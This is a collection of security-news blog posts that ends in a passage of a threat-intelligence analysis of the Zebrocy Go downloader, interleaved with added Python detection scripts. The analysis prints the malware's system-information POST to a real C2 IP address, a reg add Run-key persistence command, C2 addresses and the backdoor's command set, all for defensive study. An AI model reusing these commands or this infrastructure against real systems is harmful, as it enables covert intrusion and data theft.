Unlike other malware attacks, Cryptomining attacks can also be extremely difficult to detect, even after a system has become infected, making them especially dangerous.

Chris Whitehead, Managed Platform Product Manager at SolutionsPT, said: “There has been a significant increase in the number of cyber security attacks against Industrial Control Systems in recent years, with Cryptomining attacks emerging as the top malware threat of 2018. It’s vital that OT professionals are aware of the dangers they pose and our webinar will provide them with a great amount of usable information to take away.

“Our experts will also use the webinar to discuss various solutions to the problems posed by Cryptomining, from increasing the visibility of their industrial networks to ensuring they have both pre-emptive and reactive solutions in place.”

The 30-minute webinar begins at 11am. Attendance is free but attendees must register in advance here: https://solutionspt.com/events_webinars/live-webinar-the-evolving-cyber-security-threat-introduction-to-cryptomining/

The post SolutionsPT To Host Cryptomining Webinar For OT Professionals. appeared first on IT Security Guru.

Five Top Tips For Small Businesses Adopting Encryption.

Written by Bernard Parsons, CEO, Becrypt

Becrypt has been in the disk encryption business for more than 15 years and has carried out extensive work with governments and large enterprises. Today, a lot of what we’re doing is working with small businesses, typically organisations that are looking at adding encryption for the first time, driven by regulation such as GDPR, and those that require encryption as part of their privacy-enforcing mechanisms.

Based on the experience and feedback that Becrypt has attained, I have summarised the top-five issues that small businesses should think about if they are looking at adopting disk encryption, or if they’re looking at undertaking wider rollouts of disk encryption.

1. Ease of use
Organisations must look for products that are easy to use, easy and quick to install; an obvious requirement that is partly about reducing the time and expertise required to install products in the first place. But an important subsequent point is also total cost of ownership. If a product is not easy to install, it is usually a good indicator that actually there is a level of complexity that will remain as a long-term business overhead.
The more complex a product is, the more complexity there is to manage, leading to higher levels of required expertise and the more potential for support issues to occur over time, driving up the product’s total cost of ownership for the organisation.

2. Accessible support
Encryption can be a business-critical asset, as well as a business-enabling technology. It’s therefore important that you’re working with an organisation – whether that’s a vendor or the vendor’s partner – that can offer good, and accessible technical support to you.
Even if you get the first point right, i.e. you choose a product that’s easy to use, which reduces the amount of technical support required, you should still think about the potential for requiring support over the total life of the product. In a couple of years, you may be looking at doing something slightly differently, such as encrypting new devices that may be non-standard (such as RAID servers), and want to ensure that you can pick up a phone and talk to someone with sufficient expertise.
The option of phone-based support is important; being able to jump onto a call in a reasonable amount of time and actually talk to an expert. Therefore, we’d certainly recommend testing this process with a vendor or the partner before you go ahead and procure.

3. Proof of encryption
It’s a good first step to encrypt laptops, as organisations will always lose laptops. Encryption turns what would potentially be an information-loss, into just the loss of a physical asset, protecting the organisation’s information and addressing the organisation’s liabilities.
However, under regulation such as GDPR, there is often a requirement to prove that devices actually were encrypted in the event of a loss, in order to avoid some of the reporting requirements within these regulations. Proving that a device loss is not an information loss and avoiding the need to undertake breach notification, is something you want to be able to think about in advance. If you’re deploying a product that includes centralised management, that functionality should already be there. But many small businesses will choose to deploy in a more stand-alone configuration, without the need to stand up a central management platform.
With standalone installs, you should still ensure that that product has a reporting capability of some kind, such as online, allowing the encryption status of your estate of devices to be reported.

4. Extendibility
In the first instance, you may be looking at deploying encryption within an estate of Windows devices. But it could be the case within a year or two that you have other requirements; you might need to manage encryption on Mac devices, or on smartphones and mobile devices within that same suite of products. Therefore, it’s a good idea to look for vendors that have multi-platform offerings, helping to future-proof your technology choice. This won’t guarantee that you’re not tied to a vendor, but it at least ensures that your existing vendor remains an option as your requirements grow.

5. Best Practice
It’s a good step to encrypt devices, and be able to prove that you’ve encrypted them. However, there is an increasing regulatory requirement to demonstrate that you’ve gone through some process of ensuring that the technology you’re adopting represents best practice. For example, GDPR explicitly references ‘state-of-the-art’ technology.

To fully ensure that you’re managing liabilities, you need to evidence that you’re not just adopting technology, but that it’s appropriately ‘state-of-the-art’. Achieving this level of confidence can only be done by looking at technology that has third-party validation, normally through product assurance or product certification. This provides independent validation that the product is of an appropriate quality.

There are a variety of common certification schemes relevant for encryption products. One of these is the US standard, Federal Information Processing Standard (FIPS), which ensures that algorithms have been correctly implemented. However, organisations must be wary of adopting technology just because it has a FIPS certification. The majority of products use the same algorithms, such as Advanced Encryption Standard (AES); FIPS ensures that a third-party has validated that the vendor has correctly implemented the algorithm.

This is similar to having a locksmith check the quality of your house locks, confirming that they are of good standards. However, they are not going to mention anything about whether you frequently leave all the windows open every time you leave. FIPS will tell you that the algorithms have been implemented correctly, but vendors can, and still do, implement products inappropriately that leave vulnerabilities.

A good example of such vulnerabilities in encryption products is within Solid State Drives (SSDs). Recent research from Radboud University in The Netherlands has highlighted vulnerabilities in not just one vendor, but a whole range of vendors’ SSDs. The fundamental reason they highlight, is that actually implementing encryption well is not easy, and it is easy to make mistakes. Vendors can take shortcuts, which means that security researchers can then find resulting vulnerabilities; in this case they were able to bypass the encryption within SSDs.

Organisations are better off looking for certification schemes that are more comprehensive. One example is the Commercial Product Assurance (CPA) scheme, run by the UK National Cyber Security Centre (NCSC). CPA works alongside FIPS for validating algorithms, but it says more about the overall product quality and implementation, looking at the security architecture to make sure that it has been designed and implemented in a sensible way.

It also looks at the vendor coding and build standards, thereby reducing the risk of there being a vulnerability in the product. The risk is never fully mitigated, but it certainly goes down to a point that allows you to say that, as an organisation, you are adopting best practice.

Alongside security and liabilities, organisations also need to be concerned about the cost of being caught out by products with publicised vulnerabilities, and then about the cost of changing to a different solution.

In summary, these are the five things that we would suggest organisations, particularly SMEs, should think about as they adopt encryption. It’s not rocket science, and most good vendors, or their partners, should be able to walk you through these steps easily.

The post Five Top Tips For Small Businesses Adopting Encryption. appeared first on IT Security Guru.

Teaming up to help journalism thrive in the digital age

ICFJ training in the field.

As part of our mission to empower every person and organization on the planet to achieve more, Microsoft recognizes not just the fundamental need for a free press, but also the fundamental need for the free press to adapt to how people seek information.

Technology has empowered citizens to find, create and share information in unprecedented ways. How can we help journalists around the world tell stories, from sports updates to watchdog investigations, in ways that promote transparency, understanding and engagement?

Today, we’re proud to announce the Microsoft Modern Journalism grant program in collaboration with the International Center for Journalists (ICFJ). Based in Washington, D.C., ICFJ has a track record of fostering news innovation, building investigative networks, running exchange programs and promoting diverse voices. Its global mission — to build the expertise and digital skills that journalists need to deliver trustworthy news essential for vibrant societies — has so far created a community 100,000-journalists strong in 180 countries.

Sharon Moshavi, ICFJ’s senior vice president of new initiatives, shares their view and vision about our new partnership this way:

“We’re thrilled to partner with the Microsoft Modern Journalism Initiative to support reporting projects focused on data analysis and immersive storytelling. Through these projects, we aim to highlight innovative ways that journalists can enhance news coverage and connect more deeply with audiences.”

The grant program will operate in two phases: The first will award funding and hands-on data journalism training to two alumni of ICFJ programs. Data journalism grounds stories in fact, makes the information transparent to its audiences, and distills the essential pertinent narrative from what could otherwise be an overwhelming swamp of information. By honing the journalist’s digital skills, we’re addressing what ICFJ has defined as a “perilous” gap in newsrooms.

The second phase will award grants for funding and training journalists need to pioneer storytelling using immersive technologies like livestreaming and mixed reality. While data invites fact-based exploration on a large scale, immersive storytelling can be remarkably intimate. It is in these shared experiences where knowledge may become understanding, observation may engender empathy, and learning may translate into action.

We look forward to announcing our winners in March. In the meantime, we encourage you to see, support and join in the kind of work that ICFJ does, be it a sobering virtual tour of the largest slum in Karachi, Pakistan, the fifth most populous city in the world, or a heartening partnership of a global conglomerate and environmental and social nonprofits to safeguard water quality in Nairobi. These stories the world over remind us of the challenges that face all of us, and how much we depend on sharing stories in ways that touch us, educate us and, most importantly, inspire us to act for the best.

The post Teaming up to help journalism thrive in the digital age appeared first on The Official Microsoft Blog.

Politicised Cyber-Attacks, Mobile Roaming And Software Security: Brexit Predictions From Tech Leaders.

Following events in Westminster yesterday, senior leaders from global businesses NETSCOUT, BICS and Sonatype share their thoughts on how Brexit will impact technology, from cyber-attacks and software security challenges, to the return of mobile roaming fees.

Could Roaming Return?

“Following the rejection of the Government’s Brexit bill, and in the event of a ‘no deal’ in March, mobile tariffs in the UK would no longer be regulated by the government, and could leave operators free to re-impose surcharges for UK subscribers roaming across Europe.

“This has driven a lot of speculation about whether we’ll see an unwelcome return of post-holiday ‘bill shock’. But with LTE/4G data roaming traffic in Europe surging by 600-800% after the implementation of Roam Like at Home, it would be exceptionally unwise for operators to go against such clear demand.

“In its abolition of roaming charges, the EU set a major precedent, and motivated other operators to offer competitive international tariffs. Most of us have now grown accustomed to using our mobile phones – and all of those data-intensive apps and services – when we’re abroad, to a similar degree as when we’re in the UK. In taking that away, operators risk alienating their customer base, and risk haemorrhaging subscribers to those offering more cost-efficient roaming packages.

“In the event that all UK operators decide to opt out of Roam Like at Home, we’re still unlikely to see the high tariffs that once existed. Roaming packages promote and drive subscriber loyalty, and encourage the use of all manner of mobile services and apps, helping operators to market and deliver additional services, making it in service providers’ best interests to stay competitive.”

Mikaël Schachne, VP Mobility Solutions, BICS

Regulations Should Be Upheld, But Resourcing Will Pose Challenges

“The EU has been the driving force behind some of the most crucial pieces of software security legislation, from GDPR to the Directive on security of network and information systems. While Brexit could disrupt the UK’s adoption of such initiatives, given the critical importance of securing software, the government is unlikely to make any regulatory changes that would be to the country’s detriment.

“This mentality also means that collaboration between the UK and EU on cyber security will continue after the 29th of March. No government would want to risk the security of businesses and citizens, and so both the UK and the EU nations have a vested interest in working together to boost cyber security levels.

“However, with the UK experiencing a substantial cyber skills gap that’s set to increase in coming years, Brexit could make it difficult for British businesses to hire the right talent. At the moment, British companies are easily able to build multinational workforces to make up for a shortfall. If regulations change, and it becomes harder to recruit workers, the UK could start to lag behind other nations in terms of cyber security capabilities.”

Wai Man Yau, VP International, Sonatype

Brexit Could Fuel Cyber Attacks

“Recent years have seen significant political turbulence, from the rise of populist politicians to the shock Brexit vote. With political and ideological disputes representing the third greatest motivation for launching DDoS attacks, such a landscape has provided a fertile ground for attackers.

“With Brexit pending, we’re likely to see any geopolitical or ideological disputes echoed in cyber space. This could be in the form of attacks against EU institutions, the UK cabinet office, political parties or media outlets. Other geopolitical events are also likely to fuel attacks, making it critical that countries and businesses build their understanding of cyber reflections, and stay vigilant.”

Darren Anstee, CTO, NETSCOUT

The post Politicised Cyber-Attacks, Mobile Roaming And Software Security: Brexit Predictions From Tech Leaders. appeared first on IT Security Guru.

“Most Of The World’s Airports And Leading Destinations Remain Vulnerable To Criminal Or Rogue Mayhem”.

Virtually every one of the world’s commercial airports and leading destinations currently remains vulnerable to criminal abuse or ‘rogue’ operation of drone technology, notwithstanding the shock wake-up call from the chaos at Gatwick Airport last month before Christmas and more recently at Heathrow, as well as last week’s exploding drone incident in Yemen.

This warning, from Robert Garbett, founder and Chief Executive of Drone Major Group, the world’s leading global drone and counter drone consultancy, is “because there remains very low awareness among the business community of the extraordinary pace at which drone technology is evolving… and this makes staying ahead of the threat posed by those who would abuse this technology challenging, for even the most competent of businesses and management teams.

“The commercial air drone market is currently still like the Wild West… exciting, and representing unprecedented economic opportunity for companies and organisations which are fast adopting this exceptional technology. However, there will always be those who would flout laws and regulation to cause maximum disruption around the world. This particularly impacts on more vulnerable sectors such as airports, financial centres, energy facilities, stadiums and concert venues, etc., which require tailored defence strategies to protect against what is a new and real security challenge.

“The British Armed Forces have been world leaders in the use of drone technology, for both offence and defence, for many years, long before the recent adoption by the business world, and it is their techniques which are now being applied, particularly in counter drone strategies which utilise an ever evolving range of advanced technologies to detect, track, identify and defeat the threat posed by those who would abuse air drone technology for nefarious means.

“There are literally hundreds of counter drone products and manufacturers worldwide and the market is expanding on a daily basis making it extremely difficult to keep track… which is one reason why the rapid, often knee-jerk adoption of such technology in the face of media pressure, while sometimes providing a short-term fix, can often be a long term error of judgement and, in isolation of appropriate policies and procedures, is rarely effective.

“Our Counter Drone team, primarily ex-military, continually analyse this market to identify those systems which will be of most appropriate use to our clients in the application of both ‘soft’ and ‘hard’ effect counter drone measures. Soft effect measures include intelligence-led threat identification, robust airspace management with commensurate risk management policies and legal procedures. Hard measures are broken down into ‘Detect, Track and Identify’ and ‘Defeat’ which are subject to strict usage restrictions.

“One of the challenges for our clients in all sectors is the need to adopt drone technology always within a disciplined strategy which supports the organisation, ensures security and also ‘future proofs’ what is put in place. The adoption of counter drone technology is no exception and so we would urge those organisations reacting to recent events to take a breath and think strategically.

“As far as criminals or ‘rogue’ drone operators are concerned… they will always exist… but their task will be made much more difficult by an increasingly informed business community, the putting in place of more sophisticated counter drone strategies, the implementation of the forthcoming ‘Drone Bill’ within the UK and the adoption of the new aerial drone Standards which were launched for public and peer group consultation in November 2018 by the International Standards Organisation (ISO). Their deadline for public responses on this consultation is 21 January 2019…only six days away.”

The post “Most Of The World’s Airports And Leading Destinations Remain Vulnerable To Criminal Or Rogue Mayhem”. appeared first on IT Security Guru.

A Zebrocy Go Downloader

Last year at SAS2018 in Cancun, Mexico, “Masha and these Bears” included discussion of a subset of Sofacy activity and malware that we call “Zebrocy”, and predictions for the decline of SPLM/XAgent Sofacy activity coinciding with the acceleration of Zebrocy activity and innovation. Zebrocy was initially introduced as a Sofacy backdoor package in 2015, but the Zebrocy cluster has carved a new approach to malware development and delivery to the world of Sofacy. In line with this approach, we will present more on this Zebrocy innovation and activity playing out at SAS 2019 in Singapore.

Our colleagues at Palo Alto recently posted an analysis of Zebrocy malware. The analysis is good and marked their first detection of a Zebrocy Go variant as October 11, 2018. Because there is much to this cluster, clarifying and adding to the discussion is always productive.

Our original June 2018 writeup, “Zebrocy Innovates – Layered Spearphishing Attachments and Go Downloaders”, documents the very same downloader, putting the initial deployment of Zebrocy Go downloader activity at May 10, 2018. And while the targeting in the May event was most likely different from the October event, we documented that this same Go downloader and the same C2 were used to target a Kyrgyzstan organization. Also interesting is that the exact same system was a previous Zebrocy target earlier in 2018. So, knowing that this same activity is being reported on as “new” six months later tells us a bit about the willingness of this group to re-use rare components and infrastructure across different targets.

While they are innovating with additional languages, as we predicted in early 2018, their infrastructure and individual components may have more longevity than predicted. Additionally, at the beginning of 2018, we predicted the volume of Zebrocy activity and innovation will continue to increase, while the more traditional SPLM/XAgent activity will continue to decline. Reporting on SPLM/XAgent certainly has followed this course in 2018 as SPLM/XAgent detections wind down globally, as has Sofacy’s use of this malware from our perspective.

Much of the content below is reprinted from our June document.

The Sofacy subset we identify as “Zebrocy” continues to target Central Asian government related organizations, both in-country and at remote locations, along with a new Middle Eastern diplomatic target. And, as predicted, they continue to build out their malware set with a variety of scripts and managed code. In this case, we see new spearphishing components – an LNK file carrying powershell scripts and a Go-implemented system information collector/downloader. This is the first time we have observed a well-known APT deploy malware written in the compiled, open source language “Go”. There is much continued recent Zebrocy activity using their previously known malware set as well.

Starting in May 2018, Zebrocy spearphished Central Asian government related targets directly with this new Go downloader. For example, one attachment was a “30-144.arj” compressed archive, an older archive format handled by 7zip, Rar/WinRAR, and others. Users found “30-144.exe” inside the archive with an altered file icon made to look like the file was a Word document (regardless of the .exe file extension). And in a similar fashion in early June, Zebrocy spearphished over a half-dozen accounts targeting several Central Asian countries’ diplomatic organizations with a similar scheme, “2018-05-Invitation-Letter(1).rar//2018-05-Invitation-Letter(pril).docx”, sending out a more common Zebrocy Delphi downloader.

In other cases, delivery of the new Go downloader was not straightforward. The new Go downloader also was delivered with a new spearphishing object that rolls up multiple layers of LNK file, powershell scripts, base64 encoded content, .docx files and the Go downloader files. The downloader is an unusually large executable at over 1.5mb, written to disk and launched by a powershell script. So the attachment that arrived over email was large.

The powershell script reads the file’s contents from a very large LNK file that was included as an email attachment, and then writes it to disk along with a Word document of the same name. So, launching the downloader is followed by the opening of an identically named decoy Word document with WINWORD.EXE /n "***\30-276(pril).docx" /o. The downloader collects a large amount of system information and POSTs it to a known Zebrocy C2, then pulls down known Zebrocy Delphi payload code, launches it, and deletes itself.

We observed previous, somewhat similar spearphishing scenarios with an archive containing .LNK, .docx, and base64 encoded executable code, delivering offensive Finfisher objects in separate intrusion activity clusters. This activity was not Sofacy, but the spearphishing techniques were somewhat similar – the layered powershell script attachment technique is not the same, but not altogether new.

And, it is important to reiterate that these Central Asian government and diplomatic targets are often geolocated remotely. In the list of target geolocations, notice countries like South Korea, the Netherlands, etc. In addition to Zebrocy Go downloader data, this report provides data on various other observed Zebrocy malware and targets over the past three months.

Spreading

Almost all observed Zebrocy activity involves spearphishing. Spearphish attachments arrive with .rar or .arj extensions. Filename themes include official government correspondence invitations, embassy notes, and other relevant items of interest to diplomatic and government staff. Enclosed objects may be LNK, docx, or exe files.

A decoy PDF that directly targeted a Central Asian nation is included in one of the .arj attachments alongside the Go downloader. The content is titled “Possible joint projects in cooperation with the International Academy of Sciences” and lists multiple potential projects requiring international cooperation with Tajikistan and other countries. This document appears to be a legitimate one that was stolen, created mid-May 2018. While we cannot reprint potentially leaked information publicly, clearly, the document was intended for a Russian-language reader.

Powershell launcher from within LNK

The LNK containing two layers of powershell script and base64 encoded content is an unusual implementation – contents from a couple of samples are listed in the technical appendix. When opened, the script opens the shortcut file it is delivered within (“30-276(pril).docx.lnk”), pulls out the base64 encoded contents (in one case, from byte 3507 to byte 6708744), base64 decodes the content, and then repeats the same powershell decoding on a second layer. This script writes two files to disk as “30-276(pril).exe” and “30-276(pril).docx” and opens both files, leading to the launch of the Go language system information collector/downloader and a decoy Word document.
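As an added defensive example (this is not code from the report or from Kaspersky Lab), the following Python triage routine checks whether an attachment carries the layered structure described above: a Shell Link file that is far larger than any normal shortcut, mentions powershell in its body, and embeds a long base64 blob that decodes to a PE image. The ShellLink header check is the standard one (HeaderSize 0x4C plus the ShellLink CLSID); the 64 KiB size threshold, the 256-character base64 run length and the two sample LNK byte strings are constructed assumptions for this example.

```python
import base64
import re

# Standard ShellLink header start: HeaderSize 0x4C followed by the ShellLink CLSID
# 00021401-0000-0000-C000-000000000046 in its on-disk byte order.
LNK_MAGIC = b"\x4c\x00\x00\x00" + bytes.fromhex("0114020000000000c000000000000046")
# Assumed thresholds for this example: shortcuts are normally a few KiB, and a
# base64 run of 256+ characters is far longer than any path or argument string.
SIZE_THRESHOLD = 64 * 1024
B64_RUN_RE = re.compile(rb"[A-Za-z0-9+/]{256,}={0,2}")


def is_lnk(data):
    return data.startswith(LNK_MAGIC)


def mentions_powershell(data):
    """LNK strings are usually UTF-16LE, so check both encodings (ASCII-lowercased)."""
    lowered = data.lower()
    return b"powershell" in lowered or "powershell".encode("utf-16-le") in lowered


def find_base64_blobs(data):
    """Return (offset, encoded length, decoded bytes) for each long, valid base64 run."""
    blobs = []
    for m in B64_RUN_RE.finditer(data):
        try:
            decoded = base64.b64decode(m.group(0), validate=True)
        except ValueError:  # binascii.Error is a ValueError: bad length or padding
            continue
        blobs.append((m.start(), len(m.group(0)), decoded))
    return blobs


def triage(data):
    """Summarise the traits of the layered LNK launcher described in the report."""
    pe_blobs = [(off, n) for off, n, dec in find_base64_blobs(data) if dec.startswith(b"MZ")]
    return {
        "is_lnk": is_lnk(data),
        "oversized": len(data) > SIZE_THRESHOLD,
        "mentions_powershell": mentions_powershell(data),
        "embedded_pe": bool(pe_blobs),
        "pe_blob_offsets": pe_blobs,
    }


def is_layered_launcher(report):
    """A shortcut that both names powershell and embeds a base64 PE matches the pattern here."""
    return report["is_lnk"] and report["mentions_powershell"] and report["embedded_pe"]


def build_sample_lnk():
    """Constructed stand-in for the attachment: header, a UTF-16 'script', padding, base64 PE."""
    fake_pe = b"MZ" + b"\x90" * 300  # constructed placeholder, not a real executable
    script = "powershell (decoder script would be here)".encode("utf-16-le")
    return (LNK_MAGIC + b"\x00" * 56 + script
            + b"\x00" * SIZE_THRESHOLD  # mimic the multi-megabyte attachment size
            + base64.b64encode(fake_pe) + b"\x00" * 8)


def build_benign_lnk():
    """Constructed ordinary shortcut: header plus a UTF-16 target path, nothing else."""
    return LNK_MAGIC + b"\x00" * 56 + r"C:\Windows\notepad.exe".encode("utf-16-le")


if __name__ == "__main__":
    for name, blob in (("layered", build_sample_lnk()), ("benign", build_benign_lnk())):
        report = triage(blob)
        print(name, report, "-> launcher" if is_layered_launcher(report) else "-> ok")
```

The decoded blob is only inspected for its MZ header; a mail gateway would hand it to the normal executable scanning path rather than execute anything.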

Go System Information Collector/Downloader

Md5: 333d2b9e99b36fb42f9e79a2833fad9c
Sha256: fcf03bf5ef4babce577dd13483391344e957fd2c855624c9f0573880b8cba62e
Size: 1.79mb (UPX packed; 3.5mb UPX unpacked)
CompiledOn: Stomped (Wed Dec 31 17:00:00 1969)
Type: PE 32-bit Go executable
Name: 30-276(pril).exe

This new Go component not only downloads and executes another Zebrocy component, but it enumerates and collects a fair amount of system data for upload to its C2, prior to downloading and executing any further modules. It simply collects data using the systeminfo utility, and in turn makes a variety of WMI calls.

After collecting system information, the backdoor POSTs to its hardcoded C2, in this case a hardcoded IP address and URL. Note that the backdoor simply uses the default Go user-agent:

POST /technet-support/library/online-service-description.php?id_name=345XXXD5 HTTP/1.1
Host: 89.37.226.148
User-Agent: Go-http-client/1.1

With this POST, the module uploads all of the system information it just gathered with the exhaustive systeminfo utility over http: hostname, date/time, all hardware, hotfix, service and software information.
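The beacon above has two stable traits a defender can key on: the hardcoded C2 URI and the unmodified default Go user-agent. The following Python detection, added here and not part of the original report, runs those checks over a few constructed tab-separated proxy log lines (source IP, method, host, path, user-agent). The C2 IP addresses and URI paths come from the report's IoC list; the log format, the non-C2 sample hosts and the "POST to a bare IP with Go's default user-agent" heuristic are this example's assumptions.

```python
import re
from dataclasses import dataclass

# Indicators taken from the report's IoC section
ZEBROCY_C2_IPS = {
    "80.255.12.252", "89.37.226.148", "46.183.218.34",
    "185.77.131.110", "92.114.92.128",
}
ZEBROCY_URI_RE = re.compile(
    r"^/technet-support/library/online-service-description\.php\?id_name="
    r"|^/software-apptication/help-support-apl/getidpolapl\.php"
)
# Default user-agent of Go's net/http client; the downloader never changes it
GO_DEFAULT_UA_RE = re.compile(r"^Go-http-client/\d+\.\d+$")
BARE_IPV4_RE = re.compile(r"^\d{1,3}(?:\.\d{1,3}){3}$")


@dataclass
class ProxyEvent:
    src: str
    method: str
    host: str
    path: str
    user_agent: str


def parse_line(line):
    """Parse one constructed log line: src<TAB>method<TAB>host<TAB>path<TAB>user-agent."""
    parts = line.rstrip("\n").split("\t")
    if len(parts) != 5:
        return None
    return ProxyEvent(*parts)


def classify(ev):
    """Return the list of reasons an event looks like the Zebrocy Go downloader beacon."""
    reasons = []
    if ev.host in ZEBROCY_C2_IPS:
        reasons.append("known-c2-ip")
    if ZEBROCY_URI_RE.search(ev.path):
        reasons.append("known-c2-uri")
    # Weaker, IoC-independent heuristic (an assumption of this example): a POST
    # straight to a bare IP with Go's default user-agent is rare on a workstation.
    if ev.method == "POST" and GO_DEFAULT_UA_RE.match(ev.user_agent) and BARE_IPV4_RE.match(ev.host):
        reasons.append("go-default-ua-post-to-bare-ip")
    return reasons


def scan(lines):
    """Return (source IP, reasons) for every line that triggers at least one check."""
    hits = []
    for line in lines:
        ev = parse_line(line)
        if ev is None:
            continue
        reasons = classify(ev)
        if reasons:
            hits.append((ev.src, reasons))
    return hits


# Constructed sample log; the first line mirrors the request quoted in the report.
SAMPLE_LOG = [
    "10.0.0.12\tPOST\t89.37.226.148\t/technet-support/library/online-service-description.php?id_name=345XXXD5\tGo-http-client/1.1",
    "10.0.0.15\tGET\twww.example.com\t/index.html\tMozilla/5.0 (Windows NT 10.0; Win64; x64)",
    "10.0.0.20\tPOST\t203.0.113.7\t/api/upload\tGo-http-client/1.1",
    "10.0.0.31\tGET\tproxy.golang.org\t/cache/\tGo-http-client/1.1",
]

if __name__ == "__main__":
    for src, reasons in scan(SAMPLE_LOG):
        print(src, ", ".join(reasons))
```

The heuristic on its own will fire on legitimate Go tooling that talks to an IP-addressed internal service, so it is best used to raise priority on hosts that also match an indicator, not as a standalone alert.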

The module then retrieves the gzip’d, better known Zebrocy dropper over port 80 as part of an encoded jpg file, writes it to disk, and executes it from a command line:

cmd /C c:\users\XXX\appdata\local\Identities\{83AXXXXX-986F-1673-091A-02XXXXXXXXXX}\w32srv.exe

and adds a run key persistence entry with the system utility reg.exe:

cmd /C "reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v Driveupd /d c:\users\XXX\appdata\local\Identities\{83AXXXXX-986F-1673-091A-02XXXXXXXXXX}\w32srv.exe /f"
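The persistence step writes a Run-key value through reg.exe from a cmd /C wrapper, and that command line lands verbatim in process-creation telemetry. The following Python is an added example rather than the report's own code: it parses "reg add" command lines out of constructed Sysmon-style events and flags Run or RunOnce entries whose data points into a user-writable location or into the Identities folder used by this downloader. The first sample command line is the one quoted above (the masked GUID and XXX username are kept exactly as published); the event layout, the benign sample commands and the list of user-writable paths are assumptions of this example.

```python
import re

# "reg add <key> ..." anywhere in a command line (reg.exe may be wrapped in cmd /C "...")
REG_ADD_RE = re.compile(
    r"\breg(?:\.exe)?\s+add\s+\"?(?P<key>HK[A-Z_]+\\[^\"\s]+)\"?(?P<rest>.*)$",
    re.IGNORECASE,
)
RUN_KEY_SUFFIXES = (r"\currentversion\run", r"\currentversion\runonce")
# Locations a standard user can write to; assumed list for this example
USER_WRITABLE_RE = re.compile(r"\\appdata\\(?:local|roaming)\\|\\temp\\|\\users\\public\\")


def _option(flag, text):
    """Return the argument of /<flag>, quoted or bare, or None if absent."""
    m = re.search(r"/" + flag + r"\s+(?:\"([^\"]*)\"|(\S+))", text, re.IGNORECASE)
    if not m:
        return None
    return m.group(1) if m.group(1) is not None else m.group(2)


def parse_reg_add(cmdline):
    """Extract key, value name and data from a 'reg add' command line, or None."""
    m = REG_ADD_RE.search(cmdline)
    if not m:
        return None
    return {
        "key": m.group("key"),
        "value_name": _option("v", m.group("rest")),
        "data": _option("d", m.group("rest")),
    }


def is_run_key(key):
    k = key.lower().replace("hkey_current_user", "hkcu").replace("hkey_local_machine", "hklm")
    return k.endswith(RUN_KEY_SUFFIXES)


def run_key_reasons(entry):
    """Why a Run-key entry is suspicious; an empty list means nothing stood out."""
    data = (entry.get("data") or "").lower()
    reasons = []
    if USER_WRITABLE_RE.search(data):
        reasons.append("user-writable-path")
    if "\\identities\\" in data:
        reasons.append("identities-folder")  # the folder this downloader used for w32srv.exe
    return reasons


def scan_events(events):
    """Return (value name, reasons) for each suspicious Run-key write among the events."""
    findings = []
    for ev in events:
        entry = parse_reg_add(ev["command_line"])
        if entry is None or not is_run_key(entry["key"]):
            continue
        reasons = run_key_reasons(entry)
        if reasons:
            findings.append((entry["value_name"], reasons))
    return findings


# Constructed Sysmon-style process-creation events; the first is the report's command line.
ZEBROCY_CMD = (
    r'cmd /C "reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v Driveupd /d '
    r'c:\users\XXX\appdata\local\Identities\{83AXXXXX-986F-1673-091A-02XXXXXXXXXX}\w32srv.exe /f"'
)
SAMPLE_EVENTS = [
    {"image": r"C:\Windows\System32\cmd.exe", "command_line": ZEBROCY_CMD},
    {"image": r"C:\Windows\System32\reg.exe",
     "command_line": r'reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v OneDrive '
                     r'/d "C:\Program Files\Microsoft OneDrive\OneDrive.exe" /f'},
    {"image": r"C:\Windows\System32\reg.exe",
     "command_line": r"reg add HKCU\Software\Contoso\App /v Path /d c:\users\alice\appdata\local\contoso\app.exe /f"},
    {"image": r"C:\Windows\System32\reg.exe",
     "command_line": r"reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run"},
]

if __name__ == "__main__":
    for name, reasons in scan_events(SAMPLE_EVENTS):
        print(name, ", ".join(reasons))
```

Parsing the command line rather than the registry itself catches the write at the moment it happens, which also works when the malware later deletes itself but leaves the Run value behind.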

Zebrocy AutoIT Dropper

Md5: 3c58ed6913593671666283cb7315dec3
Sha256: 96c3700ad639faa85982047e05fbd71c3dfd502b09f9860685498124e7dbaa46
Size: 478.5kb (UPX packed)
Compiled: Fri Apr 27 06:40:32 2018
Type: PE32 AutoIT executable
Path, Name: appdata\Identities\{83AF1378-986F-1673-091A-02681FA62C3B}\w32srv.exe

This AutoIT dropper writes out a Delphi payload, consistent with previous behavior going back to November 2015, initially described in our January 2016 report “Zebrocy – Sofacy APT Deploys New Delphi Payload”.

Zebrocy Delphi Payload

Md5: 2f83acae57f040ac486eca5890649381
Sha256: f9e96b2a453ff8922b1e858ca2d74156cb7ba5e04b3e936b77254619e6afa4e8
Size: 786kb
Compiled: Fri Jun 19 16:22:17 1992 (stomped/altered)
Type: PE32 exe [v4.7.7]
Path, Name: c:\ProgramData\Protection\Active\armpro.exe

Interestingly, the final payload reverts back to an earlier version [v4.7.7]. A “TURBO” command is missing from this Zebrocy Delphi backdoor command list:
SYS_INFO
SCAN_ALL
SCAN_LIST
DOWNLOAD_DAY
DOWNLOAD_LIST
CREATE_FOLDER
UPLOAD_FILE
FILE_EXECUTE
DELETE_FILES
REG_WRITE_VALUE
REG_READ_VALUE
REG_DELETE_VALUE
REG_GET_KEYS_VALUES
REG_DELETE_KEY
KILL_PROCESS
CONFIG
GET_NETWORK
CMD_EXECUTE
DOWNLOAD_DATE
DELETE_FOLDER
UPLOAD_AND_EXECUTE_FILE
SCREENSHOTS
FILE_EXECUTE
SET_HIDDEN_ATTR
START
STOP
KILL_MYSELF

Infrastructure

Zebrocy backdoors are configured to directly communicate with IP assigned web server hosts over port 80, and apparently the group favors Debian Linux for this part of infrastructure: Apache 2.4.10 running on Debian Linux. A somewhat sloppy approach continues, and the group set up and configured one of the sites with digital certificates using a typical Sofacy-sounding domain that they have not yet registered: “weekpost.org”. Digital certificate details are provided in the appendix.

These “fast setup” VPS servers run in “qhoster[.]com” can be paid for with Webmoney, Bitcoin, Litecoin, Dash, Alfa Click, Qiwi, transfers from Sberbank Rossii, Svyaznoy, Promsvyazbank, and more. Although, it appears that Bitcoin and Dash may be of the most interest to help ensure anonymous transactions. Dataclub provides similar payment methods.

One of the VPS IP addresses (80.255.12[.]252) is hosted in the “afterburst[.]com”/Oxygem range. This service is the odd one out and is unusual because it only supports VISA/major credit cards and Paypal at checkout. If other payment options are provided, they are not a part of the public interface.

Victims and Targeting

